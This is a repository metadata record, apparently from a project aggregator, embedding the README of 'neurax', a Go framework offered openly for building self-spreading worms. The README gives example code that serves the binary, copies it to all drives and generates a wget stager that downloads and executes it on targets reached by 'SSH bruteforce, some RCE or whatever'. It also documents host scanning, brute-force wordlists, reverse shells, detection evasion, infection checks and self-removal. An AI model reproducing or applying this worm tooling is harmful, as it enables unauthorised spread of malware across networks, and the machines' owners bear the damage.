{"id":13509763,"url":"https://github.com/redcode-labs/neurax","last_synced_at":"2025-04-09T10:04:44.687Z","repository":{"id":42530460,"uuid":"316504138","full_name":"redcode-labs/neurax","owner":"redcode-labs","description":"A framework for constructing self-spreading binaries","archived":false,"fork":false,"pushed_at":"2023-11-23T00:39:24.000Z","size":1690,"stargazers_count":1010,"open_issues_count":4,"forks_count":102,"subscribers_count":47,"default_branch":"master","last_synced_at":"2025-04-02T08:24:22.071Z","etag":null,"topics":["golang","malware","self-spreading","worm"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/redcode-labs.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-11-27T13:08:09.000Z","updated_at":"2025-03-31T08:27:27.000Z","dependencies_parsed_at":"2024-06-18T20:12:45.982Z","dependency_job_id":null,"html_url":"https://github.com/redcode-labs/neurax","commit_stats":{"total_commits":124,"total_committers":7,"mean_commits":"17.714285714285715","dds":"0.16935483870967738","last_synced_commit":"79d55d588a32af7d0900ebacbaef26f840c31618"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/redcode-labs%2Fneurax","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/redcode-labs%2Fneurax/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/redcode-labs%2Fneurax/releases","manifests_url":"https://repos.ecosyste.ms/ap
i/v1/hosts/GitHub/repositories/redcode-labs%2Fneurax/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/redcode-labs","download_url":"https://codeload.github.com/redcode-labs/neurax/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248018060,"owners_count":21034048,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["golang","malware","self-spreading","worm"],"created_at":"2024-08-01T02:01:12.652Z","updated_at":"2025-04-09T10:04:44.636Z","avatar_url":"https://github.com/redcode-labs.png","language":"Go","funding_links":["https://paypal.me/redcodelabs?locale.x=pl_PL"],"categories":["Go","malware"],"sub_categories":[],"readme":"\u003cbr\u003e\u003c/br\u003e\n\u003cp align=\"center\"\u003e\n  \u003ca\u003e\n    \u003cimg alt=\"Neurax\" title=\"Neurax\" src=\"neurax.png\"\u003e\n  \u003c/a\u003e\n\u003c/p\u003e\n\u003cbr\u003e\u003c/br\u003e\n\u003cp align=\"center\"\u003e A framework that aids in creation of self-spreading software\u003c/p\u003e\n\n\u003cbr\u003e\u003c/br\u003e\n\n## Overview\nWith help of Neurax, Golang binaries can spread on LAN/WAN without using any external servers.\n\nDiverse config options and command stagers allow rapid propagation across various wireless environments.\n\n\n## Example code\n\n```go\npackage main\nimport . 
\"github.com/redcode-labs/Neurax\"\n\nfunc main(){\n\n  //Specify serving port and stager to use\n  Nrx.Config.Port = 5555\n  Nrx.Config.Stager = \"wget\"\n\n  //Start a server that exposes the current binary in the background\n  go NeuraxServer()\n \n  //Copy current binary to all logical drives\n  NeuraxDisks()\n\n  //Create a command stager that should be launched on target machine\n  //It will download, decode and execute the binary\n  cmd_stager := NeuraxStager()\n\n  /* Now you have to somehow execute the command generated above.\n     You can use SSH bruteforce, some RCE or whatever else you want ;\u003e */\n\n}\n```\n\u003cbr\u003e\u003c/br\u003e\n## New in v. 2.X (separate sub-project)\n- Refactor: abandoned framework-like approach in favour of a ready-to-use binary\n- Generic wget stager for all UNIX targets\n- Single config file to tweak worm's behaviour on the fly\n- Automatic self-removal via `unlinkat(2)`\n- Example LinuxKI CVE exploit to supplement network spreading capabilities \n- JSON config file is downloaded and evaluated \n- Minimalistic re-write of host harvester \n\n## New in v. 2.5\n- Optional background execution of the second-stage binary (`N.StagerBg`)\n- Command stager saves and executes in context-local path \n- It also removes the downloaded binary right after successful execution\n- Removed synchronized command execution mechanism for speed/stability reasons.\nI will come up with a decent alternative prior to next release.\n- `N.NoInfectCheck` to disable checking if host is already infected.\n- Single-execution policy on target machine, enforced with an exclusive file mutex placed inside `NeuraxServer()`.\n- Added a nested goroutine for serving the binary\n- New `httrack` stager for Linux\n- Commented-out common wordlist for detection evasion\n- Command stager can wait before removing the binary (`N.StagerRemovalDelay`)\n\n## New in v. 
2.0\n- New wordlist mutators + common passwords by country\n- Improvised passive scanning\n- `.FastScan` option that makes active scans a bit quicker\n- Wordlists are created strictly in-memory\n- `NeuraxScan()` accepts a callback function instead of channel as an argument.\n- `NeuraxScan()` scans in infinite loop with possibility to set interval between each scan of whole subnet/pool of targets\n- Reverse-DNS lookup for targets that are not in IP format\n- Extraction of target candidates from ARP cache\n- Possibility to scan only a selected list of targets + prioritizing specific targets (such as default gateways)\n- Possibility to specify interface and timeout when using passive network scan.\n- Improved command stager (can be optionally executed with elevated privileges / multiple times)\n- Few changes of options' names\n- `NeuraxConfig.` became `N.` (cause it's shorter to type)\n- Functions for random memory allocation + binary migration\n- Possibility to chain multiple stagers (ex. 
`wget` + `curl`)\n- Volume and complexity of created wordlist can be easily tuned (with options such as `.WordlistExpand`)\n- Possibility to set time-to-live of created binary\n\n\n### List of config entries\n\n\u003cspan style=\"color:#b45e02\"\u003eName\u003c/span\u003e | \u003cspan style=\"color:#5f1e2d\"\u003eDescription\u003c/span\u003e | \u003cspan style=\"color:#aa5502\"\u003eDefault value\u003c/span\u003e\n--- | --- | ---\nNrx.Config.Stager           | Name of the command stager to use | `random, platform-compatible`\nNrx.Config.StagerSudo       | If true, Linux cmd stagers are executed with elevated privileges | `false`\nNrx.Config.StagerRetry      | Number of times to re-execute the command stager | `0`\nNrx.Config.StagerRemoveDelay      | Sleep instruction is applied before removing the downloaded binary | `true`\nNrx.Config.Port             | Port to serve on | `6741`\nNrx.Config.Platform         | Platform to target | `detected automatically`\nNrx.Config.Path             | The path under which binary is saved on the host | `.`\nNrx.Config.FileName        | Name under which downloaded binary should be served and then saved | `random`\nNrx.Config.Base64           | Encode the transferred binary in base64 | `false`\nNrx.Config.CommPort        | Port that is used by binaries to communicate with each other | `7777`\nNrx.Config.CommProto       | Protocol for communication between nodes | `\"udp\"`\nNrx.Config.ReverseListener | Contains `\"\u003chost\u003e:\u003cport\u003e\"` of remote reverse shell handler | `not specified`\nNrx.Config.ReverseProto    | Protocol to use for reverse connection | `\"udp\"`\nNrx.Config.ScanRequiredPort    | NeuraxScan() treats host as active only when it has a specific port opened| `none`\nNrx.Config.ScanPassive     | NeuraxScan() detects hosts using passive ARP traffic monitoring | `false`\nNrx.Config.ScanPassiveTimeout     | NeuraxScan() monitors ARP layer this amount of seconds | `50 seconds`\nNrx.Config.ScanPassiveIface     
| Interface to use when scanning passively| `default`\nNrx.Config.ScanActiveTimeout     | NeuraxScan() sets this value as timeout for scanned port in each thread | `2 seconds`\nNrx.Config.ScanPassiveAll         | NeuraxScan() captures packets on all found devices | `false`\nNrx.Config.ScanPassiveNoArp | Passive scan doesn't set strict ARP capture filter | `false`\nNrx.Config.ScanFirst       | A slice containing IP addresses to scan first | `[]string{}`\nNrx.Config.ScanFirstOnly | NeuraxScan() scans only hosts specified within `.ScanFirst`| `false`\nNrx.Config.ScanArpCache   | NeuraxScan() scans first the hosts found in local ARP cache. Works only with active scan | `false`\nNrx.Config.ScanCidr             | NeuraxScan() scans this CIDR | `local IP + \"\\24\"`\nNrx.Config.ScanActiveThreads          | Number of threads to use for NeuraxScan() | `10`\nNrx.Config.ScanFullRange       | NeuraxScan() scans all ports of target host to determine if it is active | `from 19 to 300`\nNrx.Config.ScanInterval    | Time interval to sleep before scanning whole subnet again | `\"2m\"` \nNrx.Config.ScanHostInterval    | Time interval to sleep before scanning next host in active mode | `\"none\"` \nNrx.Config.ScanGatewayFirst | Gateway is the first host scanned when active scan is used | `false`\nNrx.Config.Verbose          | If true, all error messages are printed to STDOUT | `false`\nNrx.Config.Remove           | When any errors occur, binary removes itself from the host | `false`\nNrx.Config.PreventReexec   | If true, when any command matches with those that were already received before, it is not executed | `true`\nNrx.Config.WordlistExpand  | NeuraxWordlist() performs non-standard transformations on input words | false\nNrx.Config.WordlistCommon  | Prepend 20 most common passwords to wordlist | `false`\nNrx.Config.WordlistCommonNum | Number of common passwords to use | `all`\nNrx.Config.WordlistCommonCountries| A map[string]int that contains country codes and number of passwords 
to use| map[string]int\nNrx.Config.WordlistMutators | Mutators to use when `.WordlistExpand` is specified | `{\"single_upper\", \"cyryllic\", \"encapsule\"}`\nNrx.Config.WordlistPermuteNum | Maximum length of permutation generated by NeuraxWordlistPermute()| `2`\nNrx.Config.WordlistPermuteSeparator | A separator character to use for permutations | `\"-\"`\nNrx.Config.WordlistShuffle | Shuffle generated wordlist before returning it | `false`\nNrx.Config.AllocNum         | This entry defines how many times `NeuraxAlloc()` allocates random memory| `5`\nNrx.Config.Blacklist        | Slice that contains IP addresses that are excluded from any type of scanning | `[]string{}`\nNrx.Config.FastHTTP         | HTTP request in IsHostInfected() is performed using fasthttp library | `false`\nNrx.Config.Debug            | Enable debug messages | `false`\nNrx.Config.NoInfectCheck            | Disable checking if host is already infected | `true`\n\n### Finding new targets\nFunction `NeuraxScan(func(string))` enables detection of active hosts on local network.\nIts only argument is a callback function that is called in background for every active host.\nHost is treated as active when it has at least 1 open port, is not already infected + fulfils conditions specified within `N.`\n\n`NeuraxScan()` runs as an infinite loop - it scans whole subnet specified by `.Cidr` config entry and when every host is scanned, function sleeps for an interval given in `.ScanInterval`.\n\n### Disks infection\n  Neurax binary doesn't have to copy itself using wireless means.\n  Function `NeuraxDisks()` copies current binary (under non-suspicious name) to all logical drives that were found.\n  Copied binary is not executed, but simply resides in its destination waiting to be run.\n  `NeuraxDisks()` returns an `error` if list of disks cannot be obtained or copying to any destination was impossible.\n\nAnother function, `NeuraxZIP(num_files int) err` allows you to create a randomly named .zip archive 
containing current binary.\nIt is saved in current directory, and contains up to `num_files` random files in it.\n\n`NeuraxZIPSelf()` simply zips the current binary, creating an archive holding the same name.\n\n### Reverse connections\nAn interactive reverse shell can be established with `NeuraxReverse()`.\nIt will receive commands from hostname specified inside `.ReverseListener` in a form of `\"\u003chost\u003e:\u003cport\u003e\"`.\nProtocol that is used is defined under `.ReverseProto`.\nIf `NeuraxOpenComm()` was started before calling this function, each command will behave as described in the above section.\nIf it was not, commands will be executed locally.\n\nNote: this function should also be run as a goroutine to prevent blocking caused by infinite loop used for receiving.\n\n### Cleaning up\nWhenever `\"purge\"` command is received by a node, it resends this command to all other nodes, removes itself from host and quits.\nThis behaviour can be also commenced using `NeuraxPurge()` executed somewhere in the source.\n\n### Wordlist creation\nIf spread vector of your choice is based on some kind of bruteforce, it is good to have a proper wordlist prepared. 
\nStoring words in a text-file on client side isn't really effective, so you can mutate a basic wordlist using `NeuraxWordlist(...words) []string`.\nTo permute a set of given words, use `NeuraxWordlistPermute(..words) []string`.\n\n### Setting time-to-live \nIf you want your binary to remove itself after given time, use `NeuraxSetTTL()` at the beginning of your code.\nThis function should be launched as a goroutine.\nFor example:\n\n`go NeuraxSetTTL(\"2m\")`\n\nwill make the binary run `NeuraxPurgeSelf()` after 2 minutes from initial execution.\n\n### Using multiple stagers at once\nIf you would like to chain all stagers available for given platform, set `.Stager` to `\"chain\"`.\n\n### Moving the dropped binary\nIf you need to copy the binary after initial execution, use `NeuraxMigrate(path string)`.\nIt will copy the binary under `path`, remove current binary and execute newly migrated one.\n\n\n## Support this tool\nIf you like this project and want to see it grow, please consider making a small donation :\u003e\n\n[ \u003e\u003e\u003e\u003e\u003e DONATE \u003c\u003c\u003c\u003c\u003c](https://paypal.me/redcodelabs?locale.x=pl_PL)\n\n## License\nThis software is under [MIT license](https://en.wikipedia.org/wiki/MIT_License)","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fredcode-labs%2Fneurax","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fredcode-labs%2Fneurax","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fredcode-labs%2Fneurax/lists"}